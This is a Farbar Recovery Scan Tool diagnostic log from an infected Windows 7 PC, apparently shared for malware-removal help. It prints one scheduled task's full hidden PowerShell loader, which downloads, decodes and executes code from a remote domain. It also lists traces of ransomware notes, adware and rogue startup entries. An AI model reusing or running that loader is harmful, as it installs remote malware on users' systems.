Publicité
Publicité
Format du document : text/plain
Prévisualisation
Additional scan result of Farbar Recovery Scan Tool (x86) Version:17-02-2016
Ran by Mario (2016-02-19 13:40:06)
Running from C:\Users\Mario\Downloads
Microsoft Windows 7 Édition Intégrale (X86) (2014-05-02 16:35:45)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2531867340-1831226124-3850839779-500 - Administrator - Disabled)
Guest (S-1-5-21-2531867340-1831226124-3850839779-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2531867340-1831226124-3850839779-1002 - Limited - Enabled)
Mario (S-1-5-21-2531867340-1831226124-3850839779-1000 - Administrator - Enabled) => C:\Users\Mario
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: avast! Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Disabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus (Disabled) {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 19 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 19.0.0.245 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.11) - Français (HKLM\...\{AC76BA86-7AD7-1036-7B44-AB0000000001}) (Version: 11.0.11 - Adobe Systems Incorporated)
Age of Empires III: Complete Collection (HKLM\...\GFWL_{4541091F-1F3D-4BA3-A5A3-F71000000100}) (Version: 1.0.0000.1 - Microsoft Game Studios)
Age of Empires III: Complete Collection (Version: 1.0.0000.1 - Microsoft Game Studios) Hidden
Avast Internet Security (HKLM\...\Avast) (Version: 11.1.2253 - AVAST Software)
Battle.net (HKLM\...\Battle.net) (Version: - Blizzard Entertainment)
BitTorrent (HKU\S-1-5-21-2531867340-1831226124-3850839779-1000\...\BitTorrent) (Version: 7.9.4.40912 - BitTorrent Inc.)
Confrontation (HKLM\...\Steam App 204560) (Version: - Cyanide)
Diablo III (HKLM\...\Diablo III) (Version: - Blizzard Entertainment)
DNS Unlocker version 1.4 (HKLM\...\{E1527582-8509-4011-B922-29E3FB548882}_is1) (Version: 1.4 - www.dnsunlocker.com) <==== ATTENTION
Google Chrome (HKLM\...\Google Chrome) (Version: 44.0.2403.157 - Google Inc.)
Google Update Helper (Version: 1.3.21.153 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.28.1 - Google Inc.) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30411 (HKLM\...\{5DA8F6CD-C70E-39D8-8430-3D9808D6BD17}) (Version: 9.0.30411 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Mises à jour NVIDIA 11.10.13 (Version: 11.10.13 - NVIDIA Corporation) Hidden
Module linguistique Microsoft .NET Framework 4 Client Profile FRA (HKLM\...\Microsoft .NET Framework 4 Client Profile FRA Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Module linguistique Microsoft .NET Framework 4 Extended FRA (HKLM\...\Microsoft .NET Framework 4 Extended FRA Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
NVIDIA Logiciel système PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
NVIDIA Pilote 3D Vision 335.23 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 335.23 - NVIDIA Corporation)
NVIDIA Pilote du contrôleur 3D Vision 335.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 335.21 - NVIDIA Corporation)
NVIDIA Pilote graphique 335.23 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 335.23 - NVIDIA Corporation)
NVIDIA Virtual Audio 1.2.20 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.20 - NVIDIA Corporation)
Panneau de configuration NVIDIA 335.23 (Version: 335.23 - NVIDIA Corporation) Hidden
PlayLinc (HKLM\...\{2158685C-E2B3-4026-B0A1-0FFE31837AFD}) (Version: 2.0.2 - SCI)
SafeZone Stable 1.46.1990.139 (Version: 1.46.1990.139 - Avast Software) Hidden
SafeZone Stable 1.48.2066.44 (Version: 1.48.2066.44 - Avast Software) Hidden
Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve)
TeamViewer 10 (HKLM\...\TeamViewer) (Version: 10.0.47484 - TeamViewer)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2531867340-1831226124-3850839779-1000_Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\localserver32 -> C:\Users\Mario\AppData\Local\Temp\6082966088374474724e.exe => No File
CustomCLSID: HKU\S-1-5-21-2531867340-1831226124-3850839779-1000_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\Mario\AppData\Local\Extption\wmiTraceCtr.dll => No File
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {1235A3FB-EB03-4829-BE68-25DAD15F91AF} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-02-19] (AVAST Software)
Task: {2EF40B68-9440-4002-98FF-02F0650DB920} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-02-19] (AVAST Software)
Task: {421EF3F0-5E18-4908-B292-D94728B2AD69} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {4CA678C4-4D2F-469A-B625-028527E444CE} - System32\Tasks\{4E33E97D-A58F-FC31-A121-05817E767897} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAbwBvAHQAZgB1AG4ALgBpAG4AZgBvAC8AdQAvAD8AcQA9ADMAcgBOAEcAcgB5AGEATABHAE4ALQA5AGoAXwBjAEUAaQByAHkAYgA4AGcAUABHAHcATQBXAGUANgB2AEgAZABpAFAAbABWADIARwB6AGMAawBnAGUASQBYAHkAMQBXAGkAXwAxAFIAUQBWAGsAZABGADQASABfAE8AYgA3AEIAYwB4AE0AWQBiAEcAcgBQAFcAWAByAFcAWQBBADIAYgBfAEwATwA5AE8ATwA5AHYASgBRAFoAUwB5ADEAawBzAG4AVgBzAGEAbwByAEgAMwBIAHkAMABFAG0AMgA4AGUAOABEAGUAOABpAHYANQB2ADIAUwB3AEQAOQBRAGsAdAA5ADgAbAAtAHoAcABOAHYASAB4AEsAVQBXAFUAWAAxAE0AWgBDAGYAdwBXADUAWABLAHIAdgBQADQAcABUAE8AWABGAFEANwA2AHQAcABhADUAMgA4AGcAbgBBAGcAUQBRAF8AMwBDAHkAMgBYAFIAOQBiAEUARwBKAHEAbQA2AEwAegB2AEwAMQAyAFYARAA0ADUAagBWADQAMQBuAEsAMABaADAANwBjAG0ALQBrADcARwBDAEsAcgBQAHYAZQA5ADcAWQB5AGEAegBDAEUAUQBYAHoANABJAHkAQgBDAEQAVAA0AFQAWABYAGsAeAB3AGoAVAA5ADQATwBuAHoAVgBkAG8AaABsAEgAeABPAEkASQAxAFUAWQB4AGkANABLAFMAbwBUAHMATQBSAF8AdgAxAHEATwBoADgAWQBuAHMAawBKAHoAQgBWAGYAdwBxAFAANgBDADYAcABMAHYAbAB2AF8ANgBsADMAZAByAGcAQgBaAEwAXwA0AC0AawBuAFoASwBzAEIANAByAEwAOABGAGQAVQBEAEcAcwBHAEoAOQBWAEUATQBSAHcAOQBFAEoAQQBMAHcAbQBIAGgARgAyADYAdAAtADYAaABGAEgAQwB5AEwAWgBKAEwAcQBPAEoAeAB1AFcATgB2AFQAeQBtAFMAYgBvAHMAMgBMAHcAMQBYAFMANABTAGQASgB5AHYAdABVAEQAZwBnADMAegBLAEkARABZAF8ANwBJADgAYwAtAE4ARQBUAHIAOAB4AGMASwBFAHYAagBCAG8ANQBhAGIAWgAtAGgAcQB3AHoARgBaAFgASwBCAE0AeABlAE0ATQAzAGUAeQBLAEIAegBDAHMANQA3AGgATgBaADIAagBnAHkAaABXADcAeQBXAG4ALQBrAEEAQgBWACYAYwA9AHIATgB1AG4AdABOAE4AMgBWAGQAdQBLAGgAeABUAE0AeAA1AG4AeQBhAG0AMgBDAGgAcwBpAGgAOABjAGcAXwBPAHkATQBoAG4AVgBIAHIAbQBtADUASQBRADQANgBJAHUAMwBHAFoAbQAzAHMAVAA3AE0AOAAzAEsAVwBxAEEAVgBKAHMAdQBwAHMAbQBfAGYAOQBiAGkAbABRAGsAMgBxAFkAZgBWAFgAOQBFAGgAagAyAE8AagBUAHEAbgB0AGoAdwA4AHAAMQAzAE8AcwBNAHcAOQA3AFUAVABxAEMARwA3AG8AUwAwADQAMgA2AE8AOABLAFoASgB6AEYAYQBJAFUANgA4ADcAMgBsAEoARwB3AHUAZQBKAGIAcgB3AGMAegBSAFoAegBjAFkAZgBZAGUAMQA1AEIATQBIAFUAOQBCAGYAdgAtAHUAYgA1AEQAVAA2AEUAZQBhAFQAXwBUAE8AOQBmAFQAWgBBAGwATwBVAGUARwBUAHAAYwBhAE4AVABrAEIAcQBGAG4ANQBMAHoASQBzADcAeABWADcAcABNADEAcgBnAEMAdABNAFIAMwB3AHMAZQBjAGsAVABxAGQARwBLAE8ANwBYAFoAYgBSAGcANgBOAHMATQBiAHYAMQA4AG8ATAB0AFoASABEAEcAVgBjAG8AXwBWAGMASQAzAHQARwB6ADIATwBwAHoAaQBZAEgAWgBpAEYAOQBmAEgAagBrAFAATABFADAANgBEADEANQAxADkAVAAyAGMAVQBCADcAcABzAFoAUQA2AGsAawBpAGoAeAB5AEoAVQAwAHYAeABfAFUAUwB6AFMAYwBmAHEAcQAtAGIARgBCAEEATQBlAEsAWgB3AHYAbQBtAGEAaABtAE8AQwBRAFQARQB0AFkAZwBPAFoAVAB4AEIAbAAtAHcAMQB4AFUAdQB0AEwAbQBfAFYAZwA3ADkAUgBuAGUATwBtAG0AdgBzAGsAVAAwADIASwBEAEEASABvAGUAdwBGADIAcgBaAGIARABSAEwAOQBjADkAeABOAEQAaABDAFEAdABIADcAZABUAGUASAAyAHQANQBSAHYAYgAtAEYAawBLAFgARQBYADcASgBtAHYAYwAxAG0AQgBxADQAXwBGAGcAMwBkAEsASgBSAHEAMAAwAEkASwBIAEIAYgBxAEcAZAA0AHkAUABhAEsAZgBZAEIAbwAzAEcAeQBRAHMAZwB2AGkANAAxAEEASwBvAFMAVQBrAEoAaABGAEYAYQBVAFUAWABBAFQAMQBxAEYALQB6AGkANAB6AFUASwB5AHEAegBxAHAAbgBOAGgAZQBUAHMAZABhAGkAUgB6AEoAegBsAGQAVAB2ADgAUQBfAHEAWgBiAEYASABrAFMATQBQAE4AeQA3AGkAcwBwADQAegAzAHgAbQBMAF8AWgBoAGYANABmAFcASwA1AG8AcAAyAGEAUABzAE8AaQBaAFcAVQBoAHoATgBLAGsAYQBiAEgAaQBmAG8AUAA3AFAAUgBvADEAWABSAFgAYwB3AG4AawBxAHoAYwBCAGYASwBUADcAOABNAEgAUwAtAFEAOABXAHQATgBjAHAAegBQAGMAQgBsAHEAWQByAGwAZQBQADcANQBKADIAQwBNAFIASQBfAG8AUwA5ADcASwBiAGcANQBjAHEATAB4AGcAYwBBAFIAdgB6AGcAVABDAFcAeAB5AEwAVwBYAHUAMAA4AHUASwBoAHcAagB5AHgATwA1AHcAMwA3AHYAcgBWADkAcgBoAFMAdgA3AEgAVwB3AEwAJgByAD0AMwAyADMAOQA0ADAANwA3ADIAOQA4ADQAMAA2ADkANAA4ADAAMAAiADsAJABzAHQAcwBrAD0AIgB7ADQARQAzADMARQA5ADcARAAtAEEANQA4AEYALQBGAEMAMwAxAC0AQQAxADIAMQAtADAANQA4ADEANwBFADcANgA3ADgAOQA3AH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {712DEFDF-B057-4BAC-A6A8-41CF7347B7C2} - System32\Tasks\{3D2B6BE3-43F0-4F58-9BAD-67D510E98AE5} => pcalua.exe -a D:\SETUP.EXE -d D:\
Task: {AFCFED78-558A-433D-82FC-5272703E73E2} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-19] (Adobe Systems Incorporated)
Task: {B82B3AAE-2CBF-446D-87CD-86536713FBF5} - System32\Tasks\SafeZone scheduled Autoupdate 1453592909 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-02-01] (Avast Software)
Task: {BF1752E0-5720-42D8-A292-25428B48DD96} - System32\Tasks\{3C86DAE9-BE7A-4387-923A-52BBD1081558} => pcalua.exe -a D:\SETUP.EXE -d D:\
Task: {CC425A47-B94E-4B5C-9D94-DD359E3C91EE} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => c:\program files\windows defender\MpCmdRun.exe
Task: {DD99B38D-5597-4369-B3A4-51BFD9AEE884} - System32\Tasks\{7F164935-571D-465F-998B-F8B2690ADC59} => pcalua.exe -a D:\directx9\DXSETUP.exe -d D:\directx9
Task: {EB666DA0-929D-43BC-A6C8-6619BEC730C8} - System32\Tasks\{577E5ED9-FB93-4FE8-BCF6-1156C6AFEBE4} => pcalua.exe -a D:\autorun.exe -d D:\
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Superclean.job => c:\programdata\{ab1529fd-2a26-6967-ab15-529fd2a2a7f4}\hqghumeaylnlf.exe <==== ATTENTION
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2016-02-19 13:25 - 2016-02-19 13:25 - 00113496 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-02-19 13:25 - 2016-02-19 13:25 - 00133768 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-02-19 13:22 - 2016-02-19 13:22 - 02835968 _____ () C:\Program Files\AVAST Software\Avast\defs\16021900\algo.dll
2016-02-19 13:25 - 2016-02-19 13:25 - 00480760 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-01-23 17:55 - 2016-01-23 17:57 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-01-23 17:55 - 2016-01-23 17:55 - 00984576 _____ () C:\Program Files\AVAST Software\Avast\ffmpegsumo.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\Mario\Local Settings:init
AlternateDataStreams: C:\Users\Mario\AppData\Local:init
AlternateDataStreams: C:\Users\Mario\AppData\Local\Application Data:init
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:04 - 2009-06-10 16:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2531867340-1831226124-3850839779-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Mario\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 199.203.131.152 - 82.163.143.182
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AeLookupSvc => 3
MSCONFIG\Services: Fierce Hour => 2
MSCONFIG\Services: Frothy Manager => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: Stereo Service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+idw.html => C:\Windows\pss\how_recover+idw.html.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+idw.txt => C:\Windows\pss\how_recover+idw.txt.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+jor.html => C:\Windows\pss\how_recover+jor.html.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+jor.txt => C:\Windows\pss\how_recover+jor.txt.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+ooi.html => C:\Windows\pss\how_recover+ooi.html.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+ooi.txt => C:\Windows\pss\how_recover+ooi.txt.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^SuperOptimizer.lnk => C:\Windows\pss\SuperOptimizer.lnk.Startup
MSCONFIG\startupreg: ngungok => rundll32 "C:\Users\Mario\AppData\Local\ngungok.dll",ngungok
MSCONFIG\startupreg: NvBackend => "C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: santa_svc => C:\Users\Mario\AppData\Roaming\pwukracroic.exe
MSCONFIG\startupreg: Steam => "C:\Program Files\Steam\Steam.exe" -silent
MSCONFIG\startupreg: {B0B5D425-E780-65A1-7EBB-B0E628A49B00} => C:\Users\Mario\AppData\Roaming\Axpee\ucqil.exe
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{41BC2091-339F-4AFA-8CAB-3EAF080BCB4C}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{90C6DFC9-B609-4C6F-B303-B6900BEC3CB1}] => (Allow) C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{33839AF5-77BF-43EC-9D04-4297350F9610}] => (Allow) C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{2C590A75-AB46-4CB6-942E-27869C7CB0F8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.524\Agent.exe
FirewallRules: [{4B40A380-6A35-45DE-A26D-375D0D843B00}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.524\Agent.exe
FirewallRules: [{481A392D-4757-4CAB-9FC0-5926B3F28DCA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{6A3A2321-A71F-46CA-9E4D-B67927E3B594}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{B0CB9B61-F005-42F6-B30E-20A50C2F4D23}] => (Allow) C:\Program Files\Battle.net\Battle.net.exe
FirewallRules: [{24D14178-FB6C-4EF7-85F2-DF0DE32049C8}] => (Allow) C:\Program Files\Battle.net\Battle.net.exe
FirewallRules: [{6B104977-813E-4ACE-87A5-C2874EC27340}] => (Allow) C:\Program Files\Diablo III\Diablo III.exe
FirewallRules: [{D2A92C0E-14B4-4DF4-8D00-2BB5AE4E3C4C}] => (Allow) C:\Program Files\Diablo III\Diablo III.exe
FirewallRules: [{7B8A0FFA-8FBA-47C5-8B16-7237D5C3349F}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
